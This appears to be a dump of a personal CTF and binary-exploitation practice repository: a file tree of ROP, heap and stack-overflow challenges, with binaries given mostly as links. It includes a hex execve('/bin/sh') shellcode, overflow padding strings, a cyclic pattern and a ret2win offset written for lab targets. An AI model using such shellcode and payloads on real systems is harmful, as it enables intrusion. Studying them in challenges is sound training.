├── ROP ├── 64LinuxROP │ ├── setarch │ ├── ejemplo_tac │ ├── a.out │ ├── xplt │ ├── xplt2 │ ├── exploit │ ├── shellcode │ ├── victima │ ├── victimFSP │ ├── victimFSPNX │ ├── victimFSPNONX │ ├── victim.c │ ├── shell1.c │ ├── expNX │ ├── exploit.py │ ├── SOLvictimFSP │ ├── sol2 │ └── text ├── INTRO_ROP │ └── split │ │ ├── flag.txt │ │ ├── sol │ │ └── split ├── ROPX86 │ ├── DEP_ASLR │ │ ├── a.out │ │ ├── level3 │ │ ├── libc.so │ │ ├── sol │ │ ├── level1.c │ │ ├── commands │ │ └── exp2.py │ ├── DEPnoASLR │ │ ├── a.out │ │ ├── level2 │ │ ├── level1.c │ │ ├── exp.py │ │ ├── sol │ │ └── pensando │ ├── shellcode │ │ ├── level1 │ │ ├── level1.c │ │ ├── shellcode │ │ └── exp.py │ ├── unprotected │ │ ├── level1 │ │ ├── level2 │ │ ├── a.out │ │ ├── sol │ │ ├── level1.c │ │ └── exp.py │ └── commands └── ROPX64 │ ├── MEMLEAK_DYNELF │ └── x86xD │ │ ├── level4 │ │ ├── read_prueba │ │ ├── read_prueba.c │ │ ├── level1.c │ │ └── exp.py │ └── exp.py ├── common ├── passwds ├── commands3 ├── commands1 ├── commands2 ├── formatFullASLR ├── exploitFMTS.py └── pwntools_template.py ├── .gitignore ├── ROPemporium ├── CALLME │ └── x64 │ │ ├── key2.dat │ │ ├── key1.dat │ │ ├── callme │ │ ├── libcallme.so │ │ ├── encrypted_flag.dat │ │ └── exploit.py ├── SPLIT │ ├── flag.txt │ ├── exp │ ├── split │ └── exploit.py ├── RET2WIN │ ├── flag.txt │ ├── ret2win │ └── writeup.txt ├── WRITE │ └── x64 │ │ ├── flag.txt │ │ ├── write4 │ │ ├── libwrite4.so │ │ └── exploit.py └── write4.zip ├── HEAP ├── HeapLAB │ ├── unsafe_unlink │ │ ├── test.py │ │ ├── demo │ │ ├── unsafe_unlink │ │ ├── assets │ │ │ └── vis_free.png │ │ └── exploit.py │ ├── fastbin_dup │ │ ├── demo │ │ ├── fastbin_dup │ │ ├── assets │ │ │ ├── Imagen1.png │ │ │ ├── Imagen2.png │ │ │ ├── Imagen3.png │ │ │ ├── Imagen4.png │ │ │ ├── Imagen5.png │ │ │ ├── Imagen6.png │ │ │ └── Imagen7.png │ │ ├── README.md │ │ ├── exploit-write.py │ │ └── exploit-shell.py │ ├── house_of_force │ │ ├── demo │ │ ├── house_of_force │ │ ├── exploit-write.py │ │ └── exploit-shell.py │ ├── safe_unlink │ │ ├── safe_unlink │ │ ├── assets │ │ │ ├── Image1.png │ │ │ ├── Image2.png │ │ │ ├── Image3.png │ │ │ ├── Image4.png │ │ │ ├── Image5.png │ │ │ ├── Image6.png │ │ │ ├── Image7.png │ │ │ ├── Image8.png │ │ │ ├── shell.png │ │ │ ├── checksec.png │ │ │ └── reflected_write.jpeg │ │ ├── exploit.py │ │ └── README.md │ ├── challenge-one_byte │ │ ├── one_byte │ │ └── pwntools_template.py │ ├── malloc_testbed │ │ ├── malloc_testbed │ │ ├── change_glibc_version.py │ │ └── pwntools_template.py │ ├── house_of_orange │ │ ├── house_of_orange │ │ └── pwntools_template.py │ ├── HeapLab - GLIBC Heap Exploitation.pdf │ ├── challenge-fastbin_dup │ │ ├── fastbin_dup_2 │ │ ├── assets │ │ │ ├── Imagen1.png │ │ │ ├── Imagen10.png │ │ │ ├── Imagen11.png │ │ │ ├── Imagen12.png │ │ │ ├── Imagen13.png │ │ │ ├── Imagen14.png │ │ │ ├── Imagen15.png │ │ │ ├── Imagen16.png │ │ │ ├── Imagen17.png │ │ │ ├── Imagen2.png │ │ │ ├── Imagen3.png │ │ │ ├── Imagen4.png │ │ │ ├── Imagen5.png │ │ │ ├── Imagen6.png │ │ │ ├── Imagen7.png │ │ │ ├── Imagen8.png │ │ │ └── Imagen9.png │ │ ├── writeup.txt │ │ ├── passwords.txt │ │ ├── exploit.py │ │ └── README.md │ ├── src │ │ ├── demo_top_chunk.c │ │ ├── demo_unsortedbin.c │ │ └── demo_fastbins.c │ └── README.md ├── syscallMalloc │ ├── mmap32 │ ├── sbrk │ ├── sbrk32 │ ├── mthread │ ├── mthread32 │ ├── sbrk.c │ ├── mmap.c │ ├── mthread.c │ └── mmapMUMAP └── HEAP-ANALYSIS │ ├── heap-test │ ├── heap-testx64 │ └── heap-analysis.c ├── Nightmare ├── stackOverflow │ ├── BASIC │ │ ├── TokioW17-justdoit │ │ │ ├── exp.txt │ │ │ ├── flag.txt │ │ │ ├── exp2.txt │ │ │ └── just_do_it │ │ ├── Tamula19pwn1 │ │ │ ├── flag.txt │ │ │ ├── pwn1 │ │ │ └── sol.txt │ │ ├── picoctf18 │ │ │ ├── buffer_oc_0 │ │ │ │ ├── sol │ │ │ │ ├── vuln │ │ │ │ ├── reto │ │ │ │ └── vuln.c │ │ │ └── buffer_of1 │ │ │ │ ├── a.out │ │ │ │ ├── vuln │ │ │ │ ├── sol │ │ │ │ ├── reto │ │ │ │ └── vuln.c │ │ ├── csaw18Boi │ │ │ ├── boi │ │ │ ├── expboi.txt │ │ │ └── exploit.py │ │ ├── Csaw18-GetIt │ │ │ ├── exp.txt │ │ │ ├── get_it │ │ │ └── exp.py │ │ ├── csaw17_pilot │ │ │ ├── exp.txt │ │ │ ├── pilot │ │ │ ├── exploit.py │ │ │ └── solution.txt │ │ └── Insomni2016-smartstove │ │ │ └── smartstove │ ├── ASLR │ │ ├── CSAW16-WARMUP │ │ │ ├── flag.txt │ │ │ ├── exp2.txt │ │ │ ├── exp.txt │ │ │ ├── exp1.txt │ │ │ ├── payload.txt │ │ │ ├── warmup │ │ │ ├── solve.txt │ │ │ └── exp.py │ │ ├── tu17_vulnchat │ │ │ ├── flag.txt │ │ │ ├── pattern.txt │ │ │ ├── core │ │ │ ├── vuln-chat │ │ │ ├── noexplit.txt │ │ │ └── exp1.py │ │ ├── tamu19_pwn3 │ │ │ ├── pwn3 │ │ │ ├── exp.py │ │ │ └── exploit.py │ │ └── tu18_shellaeasy │ │ │ ├── expgdb.txt │ │ │ ├── shella-easy │ │ │ └── exp.py │ ├── NXENABLED │ │ └── bkp16_simplecalc │ │ │ └── simplecalc │ └── DINAMIC-BOF │ │ └── 08-bof_dynamic │ │ ├── csawquals17_svc │ │ ├── svc │ │ ├── libc-2.23.so │ │ └── exploit.py │ │ ├── utc19_shellme │ │ ├── server │ │ ├── libc6_2.27-3ubuntu1_i386.so │ │ ├── idLibc.py │ │ └── exploit.py │ │ ├── csaw19_babyboi │ │ ├── baby_boi │ │ ├── libc-2.27.so │ │ ├── baby_boi.c │ │ ├── exploit.py │ │ └── readme.md │ │ ├── fb19_overfloat │ │ ├── overfloat │ │ ├── libc-2.27.so │ │ └── exploit.py │ │ └── hs19_storytime │ │ ├── libc.so.6 │ │ ├── storytime │ │ └── exploit.py └── beginnerRev │ ├── HelihumperRev │ └── rev │ └── CSAW19-BELAF │ └── beleaf ├── ARM └── ret2win_armv5 │ ├── flag.txt │ └── ret2win_armv5 ├── docker_suites └── ubuntu20-pwndbg │ ├── mount │ └── CALLME │ │ └── x64 │ │ ├── key2.dat │ │ ├── key1.dat │ │ ├── callme │ │ ├── libcallme.so │ │ ├── encrypted_flag.dat │ │ └── exp2.py │ ├── Dockerfile │ └── README.md ├── execv ├── rop ├── remote ├── comando ├── remote.c ├── rop.c ├── comando.c └── exploit.py ├── PWNable ├── BOF │ ├── bof │ └── bof-solucion ├── flag │ ├── flag │ └── flag-soluion ├── passcode │ ├── pasccode │ └── passcode.c └── final0 │ ├── final0-cp.py │ └── fianl0 ├── ADWorld ├── mary │ ├── marty │ ├── exploit.py │ └── exploitFMTS.py ├── STACK2 │ ├── stack2 │ ├── exploit.py │ └── pwntools_template.py └── dice │ ├── dice_game │ ├── libc.so.6 │ └── exploit.py ├── PWNable.tw ├── CALC │ ├── calc │ ├── calc.i64 │ ├── init_pool.c │ ├── exploit.py │ ├── eval.c │ ├── exp.py │ ├── read.c │ ├── calc.c │ ├── get_expr.c │ └── parse_expr.c ├── START │ ├── start │ ├── start.til │ ├── tryme │ ├── start.id0 │ ├── start.id1 │ ├── start.nam │ ├── plan │ ├── sol │ └── exp.py ├── HEAP-PARADISE │ ├── libc_64.so.6 │ └── heap_paradise └── ORW │ └── exp.py ├── HacktheBox ├── ropme │ ├── ropme │ └── exp.py ├── you_know │ ├── vuln │ └── exp.py └── You_know_0xDiablos.zip ├── shellcodeHandbook ├── OVERFLOW │ ├── overflow │ ├── buffer.c │ └── overflow.c ├── SHELLCODE │ ├── execve │ ├── exit.o │ ├── exit.asm │ ├── test_shellcode │ ├── exit_notNULLS.asm │ ├── exit_notNULLS.o │ ├── test_shellcode2 │ ├── exit_shellcode_notNULLS │ ├── execve.c │ ├── test_shellcode.c │ └── test_shellcode2.c ├── INTDIVERSION │ ├── serial │ ├── serialx64 │ ├── EXP │ │ └── direccionx86 │ ├── serial.c │ └── disas_valid_Serial └── INTRODUCTION │ ├── a.out │ ├── function │ ├── function32 │ └── function.c ├── Templates ├── patch.py ├── patch_in_run_libc.py ├── leak_binary_fs.py ├── leak_libc.py ├── heap.py └── leak_binary_rop.py ├── MIPS ├── procedures1.asm ├── procedures2.asm ├── hello-world.asm └── math.asm └── CallingConventions ├── CDECL ├── FASTCALL └── STDCALL /ROP/64LinuxROP/setarch: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /common/passwds: -------------------------------------------------------------------------------- 1 | hola 2 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | venv 2 | .gdb_history 3 | core 4 | -------------------------------------------------------------------------------- /ROPemporium/CALLME/x64/key2.dat: -------------------------------------------------------------------------------- 1 |  -------------------------------------------------------------------------------- /HEAP/HeapLAB/unsafe_unlink/test.py: -------------------------------------------------------------------------------- 1 | print('A'*140) 2 | -------------------------------------------------------------------------------- /ROPemporium/CALLME/x64/key1.dat: -------------------------------------------------------------------------------- 1 |  2 |  -------------------------------------------------------------------------------- /Nightmare/stackOverflow/BASIC/TokioW17-justdoit/exp.txt: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /ROP/64LinuxROP/ejemplo_tac: -------------------------------------------------------------------------------- 1 | hola mundo 2 | aqui estoy 3 | -------------------------------------------------------------------------------- /ARM/ret2win_armv5/flag.txt: -------------------------------------------------------------------------------- 1 | ROPE{a_placeholder_32byte_flag!} 2 | -------------------------------------------------------------------------------- /ROPemporium/SPLIT/flag.txt: -------------------------------------------------------------------------------- 1 | ROPE{a_placeholder_32byte_flag!} 2 | -------------------------------------------------------------------------------- /ROP/INTRO_ROP/split/flag.txt: -------------------------------------------------------------------------------- 1 | ROPE{a_placeholder_32byte_flag!} 2 | -------------------------------------------------------------------------------- /ROP/INTRO_ROP/split/sol: -------------------------------------------------------------------------------- 1 | r2 -I split #NO FUNCIONA TU RADARE 2 2 | -------------------------------------------------------------------------------- /ROPemporium/RET2WIN/flag.txt: -------------------------------------------------------------------------------- 1 | ROPE{a_placeholder_32byte_flag!} 2 | -------------------------------------------------------------------------------- /ROPemporium/SPLIT/exp: -------------------------------------------------------------------------------- 1 | AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB 2 | -------------------------------------------------------------------------------- /ROPemporium/WRITE/x64/flag.txt: -------------------------------------------------------------------------------- 1 | ROPE{a_placeholder_32byte_flag!} 2 | -------------------------------------------------------------------------------- /Nightmare/stackOverflow/ASLR/CSAW16-WARMUP/flag.txt: -------------------------------------------------------------------------------- 1 | flag{g0ttem_b0yz} 2 | -------------------------------------------------------------------------------- /Nightmare/stackOverflow/ASLR/tu17_vulnchat/flag.txt: -------------------------------------------------------------------------------- 1 | flag{g0ttem_b0yz} 2 | -------------------------------------------------------------------------------- /docker_suites/ubuntu20-pwndbg/mount/CALLME/x64/key2.dat: -------------------------------------------------------------------------------- 1 |  -------------------------------------------------------------------------------- /execv/rop: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/execv/rop -------------------------------------------------------------------------------- /Nightmare/stackOverflow/BASIC/Tamula19pwn1/flag.txt: -------------------------------------------------------------------------------- 1 | 2 | flag{g0ttem_b0yz} 3 | -------------------------------------------------------------------------------- /Nightmare/stackOverflow/BASIC/picoctf18/buffer_oc_0/sol: -------------------------------------------------------------------------------- 1 | solo overflowea 2 | -------------------------------------------------------------------------------- /docker_suites/ubuntu20-pwndbg/mount/CALLME/x64/key1.dat: -------------------------------------------------------------------------------- 1 |  2 |  -------------------------------------------------------------------------------- /execv/remote: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/execv/remote -------------------------------------------------------------------------------- /PWNable/BOF/bof: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/PWNable/BOF/bof -------------------------------------------------------------------------------- /execv/comando: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/execv/comando -------------------------------------------------------------------------------- /PWNable/flag/flag: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/PWNable/flag/flag -------------------------------------------------------------------------------- /ADWorld/mary/marty: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/ADWorld/mary/marty -------------------------------------------------------------------------------- /Nightmare/stackOverflow/BASIC/TokioW17-justdoit/flag.txt: -------------------------------------------------------------------------------- 1 | TWCTF{pwnable_warmup_I_did_it!} 2 | -------------------------------------------------------------------------------- /PWNable.tw/CALC/calc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/PWNable.tw/CALC/calc -------------------------------------------------------------------------------- /ROP/64LinuxROP/a.out: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/ROP/64LinuxROP/a.out -------------------------------------------------------------------------------- /ROP/64LinuxROP/xplt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/ROP/64LinuxROP/xplt -------------------------------------------------------------------------------- /ROP/64LinuxROP/xplt2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/ROP/64LinuxROP/xplt2 -------------------------------------------------------------------------------- /ADWorld/STACK2/stack2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/ADWorld/STACK2/stack2 -------------------------------------------------------------------------------- /ADWorld/dice/dice_game: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/ADWorld/dice/dice_game -------------------------------------------------------------------------------- /ADWorld/dice/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/ADWorld/dice/libc.so.6 -------------------------------------------------------------------------------- /HacktheBox/ropme/ropme: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HacktheBox/ropme/ropme -------------------------------------------------------------------------------- /PWNable.tw/START/start: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/PWNable.tw/START/start -------------------------------------------------------------------------------- /PWNable.tw/START/start.til: -------------------------------------------------------------------------------- 1 | IDATILLocal type definitions -------------------------------------------------------------------------------- /PWNable.tw/START/tryme: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/PWNable.tw/START/tryme -------------------------------------------------------------------------------- /ROP/64LinuxROP/exploit: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/ROP/64LinuxROP/exploit -------------------------------------------------------------------------------- /ROP/64LinuxROP/shellcode: -------------------------------------------------------------------------------- 1 | eb0e5f4831c0b03b4831f64831d20f05e8edffffff2f62696e2f736800ef 2 | bead 3 | -------------------------------------------------------------------------------- /ROP/64LinuxROP/victima: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/ROP/64LinuxROP/victima -------------------------------------------------------------------------------- /ROPemporium/write4.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/ROPemporium/write4.zip -------------------------------------------------------------------------------- /HEAP/syscallMalloc/mmap32: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/syscallMalloc/mmap32 -------------------------------------------------------------------------------- /HEAP/syscallMalloc/sbrk: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/syscallMalloc/sbrk -------------------------------------------------------------------------------- /HEAP/syscallMalloc/sbrk32: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/syscallMalloc/sbrk32 -------------------------------------------------------------------------------- /HacktheBox/you_know/vuln: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HacktheBox/you_know/vuln -------------------------------------------------------------------------------- /PWNable.tw/CALC/calc.i64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/PWNable.tw/CALC/calc.i64 -------------------------------------------------------------------------------- /ROP/64LinuxROP/victimFSP: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/ROP/64LinuxROP/victimFSP -------------------------------------------------------------------------------- /ROP/INTRO_ROP/split/split: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/ROP/INTRO_ROP/split/split -------------------------------------------------------------------------------- /ROP/ROPX86/DEP_ASLR/a.out: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/ROP/ROPX86/DEP_ASLR/a.out -------------------------------------------------------------------------------- /ROPemporium/SPLIT/split: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/ROPemporium/SPLIT/split -------------------------------------------------------------------------------- /HEAP/syscallMalloc/mthread: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/syscallMalloc/mthread -------------------------------------------------------------------------------- /Nightmare/stackOverflow/BASIC/picoctf18/buffer_of1/a.out: -------------------------------------------------------------------------------- 1 | AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDDEEEEEEEEEEEE˅ 2 | -------------------------------------------------------------------------------- /PWNable.tw/START/start.id0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/PWNable.tw/START/start.id0 -------------------------------------------------------------------------------- /PWNable.tw/START/start.id1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/PWNable.tw/START/start.id1 -------------------------------------------------------------------------------- /PWNable.tw/START/start.nam: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/PWNable.tw/START/start.nam -------------------------------------------------------------------------------- /ROP/64LinuxROP/victimFSPNX: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/ROP/64LinuxROP/victimFSPNX -------------------------------------------------------------------------------- /ROP/ROPX86/DEP_ASLR/level3: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/ROP/ROPX86/DEP_ASLR/level3 -------------------------------------------------------------------------------- /ROP/ROPX86/DEP_ASLR/libc.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/ROP/ROPX86/DEP_ASLR/libc.so -------------------------------------------------------------------------------- /ROP/ROPX86/DEPnoASLR/a.out: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/ROP/ROPX86/DEPnoASLR/a.out -------------------------------------------------------------------------------- /ROP/ROPX86/DEPnoASLR/level2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/ROP/ROPX86/DEPnoASLR/level2 -------------------------------------------------------------------------------- /ROP/ROPX86/shellcode/level1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/ROP/ROPX86/shellcode/level1 -------------------------------------------------------------------------------- /ROPemporium/RET2WIN/ret2win: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/ROPemporium/RET2WIN/ret2win -------------------------------------------------------------------------------- /HEAP/HEAP-ANALYSIS/heap-test: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HEAP-ANALYSIS/heap-test -------------------------------------------------------------------------------- /HEAP/HeapLAB/fastbin_dup/demo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/fastbin_dup/demo -------------------------------------------------------------------------------- /HEAP/syscallMalloc/mthread32: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/syscallMalloc/mthread32 -------------------------------------------------------------------------------- /Nightmare/stackOverflow/ASLR/tu17_vulnchat/pattern.txt: -------------------------------------------------------------------------------- 1 | Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab 2 | -------------------------------------------------------------------------------- /ROP/64LinuxROP/victimFSPNONX: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/ROP/64LinuxROP/victimFSPNONX -------------------------------------------------------------------------------- /ROP/ROPX86/unprotected/level1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/ROP/ROPX86/unprotected/level1 -------------------------------------------------------------------------------- /ROP/ROPX86/unprotected/level2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/ROP/ROPX86/unprotected/level2 -------------------------------------------------------------------------------- /ROPemporium/CALLME/x64/callme: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/ROPemporium/CALLME/x64/callme -------------------------------------------------------------------------------- /ROPemporium/WRITE/x64/write4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/ROPemporium/WRITE/x64/write4 -------------------------------------------------------------------------------- /ARM/ret2win_armv5/ret2win_armv5: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/ARM/ret2win_armv5/ret2win_armv5 -------------------------------------------------------------------------------- /HEAP/HEAP-ANALYSIS/heap-testx64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HEAP-ANALYSIS/heap-testx64 -------------------------------------------------------------------------------- /HEAP/HeapLAB/house_of_force/demo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/house_of_force/demo -------------------------------------------------------------------------------- /HEAP/HeapLAB/unsafe_unlink/demo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/unsafe_unlink/demo -------------------------------------------------------------------------------- /HacktheBox/You_know_0xDiablos.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HacktheBox/You_know_0xDiablos.zip -------------------------------------------------------------------------------- /Nightmare/stackOverflow/ASLR/CSAW16-WARMUP/exp2.txt: -------------------------------------------------------------------------------- 1 | 00000000000000000000000000000000000000000000000000000000000 @ 2 | -------------------------------------------------------------------------------- /ROPemporium/CALLME/x64/libcallme.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/ROPemporium/CALLME/x64/libcallme.so -------------------------------------------------------------------------------- /ROPemporium/WRITE/x64/libwrite4.so: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/ROPemporium/WRITE/x64/libwrite4.so -------------------------------------------------------------------------------- /shellcodeHandbook/OVERFLOW/overflow: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/shellcodeHandbook/OVERFLOW/overflow -------------------------------------------------------------------------------- /shellcodeHandbook/SHELLCODE/execve: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/shellcodeHandbook/SHELLCODE/execve -------------------------------------------------------------------------------- /shellcodeHandbook/SHELLCODE/exit.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/shellcodeHandbook/SHELLCODE/exit.o -------------------------------------------------------------------------------- /HEAP/HeapLAB/fastbin_dup/fastbin_dup: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/fastbin_dup/fastbin_dup -------------------------------------------------------------------------------- /HEAP/HeapLAB/safe_unlink/safe_unlink: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/safe_unlink/safe_unlink -------------------------------------------------------------------------------- /Nightmare/stackOverflow/ASLR/CSAW16-WARMUP/exp.txt: -------------------------------------------------------------------------------- 1 | 0000000000000000000000000000000000000000000000000000000000000000 @ 2 | -------------------------------------------------------------------------------- /PWNable.tw/HEAP-PARADISE/libc_64.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/PWNable.tw/HEAP-PARADISE/libc_64.so.6 -------------------------------------------------------------------------------- /shellcodeHandbook/INTDIVERSION/serial: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/shellcodeHandbook/INTDIVERSION/serial -------------------------------------------------------------------------------- /shellcodeHandbook/INTRODUCTION/a.out: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/shellcodeHandbook/INTRODUCTION/a.out -------------------------------------------------------------------------------- /HEAP/HeapLAB/challenge-one_byte/one_byte: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/challenge-one_byte/one_byte -------------------------------------------------------------------------------- /HEAP/HeapLAB/unsafe_unlink/unsafe_unlink: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/unsafe_unlink/unsafe_unlink -------------------------------------------------------------------------------- /Nightmare/beginnerRev/HelihumperRev/rev: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/Nightmare/beginnerRev/HelihumperRev/rev -------------------------------------------------------------------------------- /PWNable.tw/HEAP-PARADISE/heap_paradise: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/PWNable.tw/HEAP-PARADISE/heap_paradise -------------------------------------------------------------------------------- /ROP/ROPX64/MEMLEAK_DYNELF/x86xD/level4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/ROP/ROPX64/MEMLEAK_DYNELF/x86xD/level4 -------------------------------------------------------------------------------- /ROPemporium/RET2WIN/writeup.txt: -------------------------------------------------------------------------------- 1 | 2 | ret2win=0x0000000000400756 3 | \x56\x07\x40\x00\x00\x00\x00\x00 4 | 5 | offset=a*40 6 | -------------------------------------------------------------------------------- /shellcodeHandbook/INTDIVERSION/serialx64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/shellcodeHandbook/INTDIVERSION/serialx64 -------------------------------------------------------------------------------- /shellcodeHandbook/INTRODUCTION/function: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/shellcodeHandbook/INTRODUCTION/function -------------------------------------------------------------------------------- /shellcodeHandbook/SHELLCODE/exit.asm: -------------------------------------------------------------------------------- 1 | section .text 2 | global _start 3 | 4 | _start: 5 | mov ebx,0 6 | mov eax,1 7 | int 0x80 8 | -------------------------------------------------------------------------------- /HEAP/HeapLAB/house_of_force/house_of_force: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/house_of_force/house_of_force -------------------------------------------------------------------------------- /HEAP/HeapLAB/malloc_testbed/malloc_testbed: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/malloc_testbed/malloc_testbed -------------------------------------------------------------------------------- /HEAP/HeapLAB/safe_unlink/assets/Image1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/safe_unlink/assets/Image1.png -------------------------------------------------------------------------------- /HEAP/HeapLAB/safe_unlink/assets/Image2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/safe_unlink/assets/Image2.png -------------------------------------------------------------------------------- /HEAP/HeapLAB/safe_unlink/assets/Image3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/safe_unlink/assets/Image3.png -------------------------------------------------------------------------------- /HEAP/HeapLAB/safe_unlink/assets/Image4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/safe_unlink/assets/Image4.png -------------------------------------------------------------------------------- /HEAP/HeapLAB/safe_unlink/assets/Image5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/safe_unlink/assets/Image5.png -------------------------------------------------------------------------------- /HEAP/HeapLAB/safe_unlink/assets/Image6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ivanmedina/Pwning/HEAD/HEAP/HeapLAB/safe_unlink/assets/Image6.png 